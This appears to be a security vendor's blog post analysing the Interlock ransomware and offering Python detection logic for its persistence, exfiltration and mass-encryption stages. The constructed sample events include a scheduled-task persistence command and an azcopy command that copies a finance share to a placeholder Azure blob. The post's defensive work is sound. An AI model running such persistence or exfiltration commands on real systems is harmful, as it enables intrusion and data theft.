Interlock Ransomware Detection: High-Profile and Double-Extortion Attacks Using a New Ransomware Variant
Adversaries employ the new Interlock ransomware in recently observed big-game hunting and double-extortion attacks against U.S. and European organizations in multiple industry sectors. Defenders assess with low confidence that Interlock may be a newly diversified group linked to Rhysida ransomware affiliates or developers, based on comparable TTPs and encryptor binaries.
Detect Interlock Ransomware
Ransomware attacks continue to increase, nearly doubling from 2022 to 2023, and the trend persists as new ransomware operators emerge. The rise of the new Interlock ransomware variant, targeting organizations globally in an array of industry sectors, including healthcare and government, urges cyber defenders to find innovative strategies to combat emerging ransomware threats.
SOC Prime Platform for collective cyber defense equips security teams with relevant detection algorithms aligned with MITRE ATT&CK®, enriched with tailored CTI and relevant metadata, and compatible with 30+ SIEM, EDR, and Data Lake platforms. Click the Explore Detections button to get to the dedicated Sigma rules for Interlock ransomware detection.
To get more detections for proactive cyber defense against emerging ransomware attacks, click the following link.
Interlock Ransomware Attack Analysis
An emerging ransomware variant dubbed Interlock first appeared in the cyber threat arena in September 2024. Ransomware operators behind it have been launching high-profile and double-extortion attacks against global organizations in diverse business verticals, including healthcare, technology, and the public sector in the U.S., as well as manufacturing in Europe. Notably, Interlock ransomware maintainers operate a data leak site, “Worldwide Secrets Blog,” where they post victims’ leaked data, offer victim support chat, and list the email “interlock@2mail[.]co”. Interlock establishes a C2 connection through a scheduled task over an anonymized network, enhancing its stealth and complexity. Adversaries claim to exploit unpatched vulnerabilities in organizations’ infrastructure, citing a dual motivation of financial gain and holding companies accountable for inadequate cybersecurity.
According to Cisco Talos' investigation into the Interlock ransomware attacks, adversaries remained in the compromised environment for around 17 days, from the initial breach to the deployment and execution of the ransomware encryptor binary. Notably, Interlock ransomware has both Windows Portable Executable (EXE) and Linux executable (ELF) versions, suggesting the attackers target machines running both Windows and Linux.
The infection chain starts with the adversary gaining access to the targeted system through a fake Google Chrome updater executable, which the victim is lured into downloading from a compromised legitimate news site. When the lure is clicked, the fake updater is fetched onto the device from a second weaponized URL hosted on a legitimate retailer's site.
Adversaries leverage several components in the delivery chain, including a RAT disguised as a fake browser updater, PowerShell scripts, a Golang-based credential stealer, and a keylogger before deploying the Interlock ransomware. They primarily use RDP for lateral movement within the victim’s network, along with tools like AnyDesk and PuTTY. Additionally, they apply Azure Storage Explorer and AZCopy to exfiltrate data to an attacker-controlled Azure storage blob.
Attackers deploy the Interlock ransomware encryptor masquerading as a legitimate file. When executed, it encrypts targeted files, appends the “.Interlock” extension, and places a ransom note in each affected folder. The ransom note warns against file recovery attempts or rebooting the systems and demands a response within 96 hours under threat of leaking the data and notifying the media, risking financial and reputational damage.
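The TTPs described in the attack chain above (scheduled-task persistence for C2, AZCopy exfiltration to an attacker-controlled Azure blob, and a burst of “.Interlock” renames with a ransom note dropped per folder) can be turned into straightforward alert logic over normalised endpoint telemetry. The following Python is an added illustration written for this post, not code from SOC Prime, Talos, or the Sigma rules referenced here. The sample events, host names, paths, the blob URL and the ransom-note file name are all constructed; the real note name is not given in the text, so a placeholder is used and the detector keys on behaviour (one new file name appearing across most affected folders) rather than on that name.

```python
import re
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs). Each dict is a flattened
# process-creation or file event as a SIEM or EDR might normalise it.
SAMPLE_EVENTS = [
    {"ts": 100, "type": "process", "host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "C:\Users\alice\AppData\Local\Temp\upd.exe"'},
    {"ts": 900, "type": "process", "host": "FS01", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r"azcopy.exe copy D:\Shares\Finance https://constructed-example.blob.core.windows.net/c?sig=PLACEHOLDER --recursive"},
    {"ts": 950, "type": "process", "host": "FS01", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
# Simulated encryptor activity: 25 renames to ".Interlock" across 5 folders within
# 25 seconds, followed by one (placeholder-named) note file created in each folder.
for i in range(25):
    folder = rf"D:\Shares\Finance\Q{i % 5}"
    SAMPLE_EVENTS.append({"ts": 1000 + i, "type": "file_rename", "host": "FS01",
                          "old": rf"{folder}\report{i}.xlsx", "new": rf"{folder}\report{i}.xlsx.Interlock"})
for q in range(5):
    SAMPLE_EVENTS.append({"ts": 1030 + q, "type": "file_create", "host": "FS01",
                          "path": rf"D:\Shares\Finance\Q{q}\RANSOM_NOTE_PLACEHOLDER.txt"})

# Paths a normal admin-created task rarely points at but droppers often use.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.IGNORECASE)
# azcopy.exe is the real AZCopy binary; Storage Explorer could be added by its binary name.
EXFIL_TOOLS = {"azcopy.exe"}


def detect_scheduled_task_persistence(events):
    """Flag `schtasks /create` whose action (/tr) lives in a user-writable path."""
    alerts = []
    for e in events:
        if e["type"] != "process" or PureWindowsPath(e["image"]).name.lower() != "schtasks.exe":
            continue
        if "/create" in e["cmdline"].lower() and USER_WRITABLE.search(e["cmdline"]):
            alerts.append({"rule": "schtask_user_writable_action", "host": e["host"],
                           "ts": e["ts"], "cmdline": e["cmdline"]})
    return alerts


def detect_azure_blob_exfil(events):
    """Flag AZCopy launches whose command line references an Azure blob endpoint."""
    alerts = []
    for e in events:
        if e["type"] != "process":
            continue
        if PureWindowsPath(e["image"]).name.lower() in EXFIL_TOOLS \
                and "blob.core.windows.net" in e["cmdline"].lower():
            alerts.append({"rule": "azcopy_to_blob_endpoint", "host": e["host"],
                           "ts": e["ts"], "cmdline": e["cmdline"]})
    return alerts


def _common_new_file(events, host, folders, t0, t1):
    """Name of a file created in at least half of `folders` on `host` within [t0, t1], else None."""
    seen = set()
    for e in events:
        if e["type"] == "file_create" and e["host"] == host and t0 <= e["ts"] <= t1:
            p = PureWindowsPath(e["path"])
            if str(p.parent) in folders:
                seen.add((p.name, str(p.parent)))   # de-duplicate per folder
    names = Counter(name for name, _ in seen)
    if not names:
        return None
    name, hits = names.most_common(1)[0]
    return name if hits * 2 >= len(folders) else None


def detect_mass_interlock_rename(events, window=60, threshold=20):
    """Sliding-window count of renames to '.Interlock' per host; on breach, also
    report how many folders were hit and whether a common note file appeared."""
    per_host = defaultdict(list)
    for e in events:
        if e["type"] == "file_rename" and e["new"].lower().endswith(".interlock"):
            per_host[e["host"]].append(e)
    alerts = []
    for host, evs in per_host.items():
        evs.sort(key=lambda x: x["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                hit = evs[start:end + 1]
                folders = {str(PureWindowsPath(x["new"]).parent) for x in hit}
                note = _common_new_file(events, host, folders, hit[0]["ts"], hit[-1]["ts"] + window)
                alerts.append({"rule": "mass_interlock_rename", "host": host, "count": len(hit),
                               "folders": len(folders), "ransom_note": note})
                break   # one alert per host is enough; the rest is the same incident
    return alerts


def run_detections(events):
    """Run all three detectors and group their alerts by the attack phase they cover."""
    return {"persistence": detect_scheduled_task_persistence(events),
            "exfiltration": detect_azure_blob_exfil(events),
            "encryption": detect_mass_interlock_rename(events)}


if __name__ == "__main__":
    for phase, alerts in run_detections(SAMPLE_EVENTS).items():
        for a in alerts:
            print(phase, a)
```

The rename detector fires on the twentieth rename within the 60-second window, well before the whole share is touched, and the `notepad.exe` event shows that ordinary process activity passes through silently. In production the thresholds would be tuned per file server, and the scheduled-task rule would be enriched with the task's author and trigger rather than the command line alone.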
Notably, Talos researchers assess with low confidence that Interlock ransomware is a new group emerging from Rhysida operators, based on similarities in adversary TTPs and ransomware behaviors. In addition, researchers observed code overlaps between the binaries of Interlock and Rhysida, particularly in the hardcoded exclusion lists for Windows variants.
With the increasing threat of double-extortion Interlock ransomware attacks, organizations are striving to elevate their cyber defenses to prevent data breaches. SOC Prime’s complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection serves as a future-proof solution to minimize the risks of ransomware attacks and emerging cyber threats of any sophistication.